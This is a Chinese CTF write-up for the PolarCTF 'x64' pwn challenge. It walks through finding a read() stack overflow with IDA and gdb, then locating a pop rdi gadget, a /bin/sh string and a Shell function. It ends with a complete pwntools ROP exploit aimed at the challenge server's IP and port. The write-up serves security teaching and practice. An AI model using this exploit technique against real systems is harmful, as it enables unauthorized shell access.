当前位置: 首页 > news >正文

【PolarCTF】x64

先检查下,发现是64位的程序

IDA分析程序

这里很明显read函数存在溢出

然后可以看到后面函数Shell

同时也可以找到/bin/sh字符串

这里我们可以通过IDA查找

攻击思路如下:

填充垃圾数据 pop_rdi_ret将/bin/sh传递到rdi中 执行Shell函数 获得shell

gdb调试程序

将cyclic的字符输入到程序中,然后我们可以通过

x rbp

或者

info registers rbp

可以看到堆底里面的内容

通过计算可以看到距离rbp的距离为128(十进制)

128转为十六进制,可以看到就是0x80,和IDA分析的结果是一样的

因为还要覆盖返回地址,因此填充0x80个字节+0x8个字节

除了上面的方法找Shell函数地址、/bin/sh字符地址

还可以通过objdump查找shell函数地址

通过ROPgadget 查找可以传递给rdi的pop_ret,pop_rdi_ret的地址为0x4007e3

我们也可以使用ROPgadget来查找/bin/sh地址,可以看到/bin/sh的地址为0x601060

bin/sh的地址为0x601060

pop_rdi_ret的地址为0x4007e3

Shell函数的地址0x4006b6

payload如下

from pwn import * io = remote('1.95.36.136',2065) system_addr = 0x4006b6 sh_addr = 0x601060 pop_rdi = 0x4007e3 padding = 0x80+0x8 payload = b'A'*padding payload += p64(pop_rdi) payload += p64(sh_addr) payload += p64(system_addr) io.sendline(payload) io.interactive()

http://www.jsqmd.com/news/668189/

相关文章:

  • FastGPT连接OneAPI实战:如何用一套密钥管理多个大模型(通义千问、ChatGLM等)
  • 2026青岛成人高考机构排行榜:Top5深度测评,帮你避开选机构的“坑” - 商业科技观察
  • 3K 行代码造一个越用越聪明的 AI Agent:GenericAgent 登顶 GitHub Trending
  • 用FFmpeg无损剪辑H.264视频翻车实录:从‘-c copy’报错到成功导出MP4的完整避坑指南
  • Python在图片上画圆形:从入门到实战
  • 3步恢复Windows 11 LTSC微软商店:完整应用生态一键安装指南
  • 【Linux从入门到精通】第6篇:管道符、重定向与通配符——命令行效率的核心秘诀
  • Windows服务器运维:如何用mstsc命令和.rdp配置文件打造你的专属远程桌面管理库
  • 【传播模型】CoVeni计算并可视化了病毒附Matlab代码
  • 别光会binwalk了!CTF MISC实战中这5个冷门但好用的文件分析工具,帮你快速定位flag
  • 三步搞定Windows ADB驱动安装:告别繁琐配置,专注Android开发
  • 阿里云盘的FatalError
  • Win11Debloat:三步彻底清理Windows系统,让电脑重获新生
  • 【数字信号调制】自适应调制解调通信系统误码率仿真【含Matlab源码 15364期】
  • LangGraph 并行执行优化:如何提升多智能体任务处理效率?
  • 告别Tomcat:Spring Boot应用改造为纯War包,适配宝兰德等商用中间件全指南
  • Python在图片上画多边形:从简单轮廓到复杂区域标注
  • **发散创新:用Python实现因果推理在推荐系统中的落地应用**在当今数据
  • 【AI面试八股文 Vol.1.1 | 专题4:Conditional Edge】Conditional Edge:动态路由分支逻辑实现
  • SolidWorks参数化设计避坑指南:为什么你的VBA宏跑一次就报错?
  • 家庭网络总断网?可能是你家的路由器接错了!用环路检测功能快速排查
  • Unity Magica Cloth:从入门到精通,打造次世代角色动态服饰
  • 别再只用MD5了!聊聊PBKDF2如何用‘盐’和‘慢炖’保护你的用户密码
  • OpenClaw怎么搭建?2026年4月云端大模型Coding Plan配置指南
  • 如何快速掌握CREST:药物设计中分子构象采样的完整指南
  • NVIDIA Profile Inspector 终极指南:解锁隐藏设置,轻松优化游戏性能
  • 2026年降AI后重新检测还是偏高怎么处理:多轮降AI完整攻略
  • Orwell Dev-C++ 和 Embarcadero Dev-C++ 哪个更好
  • (build/soong/scripts/manifest_check.py --enforce-uses-libraries --enforce-uses-libraries-status
  • 从E·M·福斯特的《英国人性格的笔记》看技术文档写作:如何避免“未发育的心”与“自满的陷阱”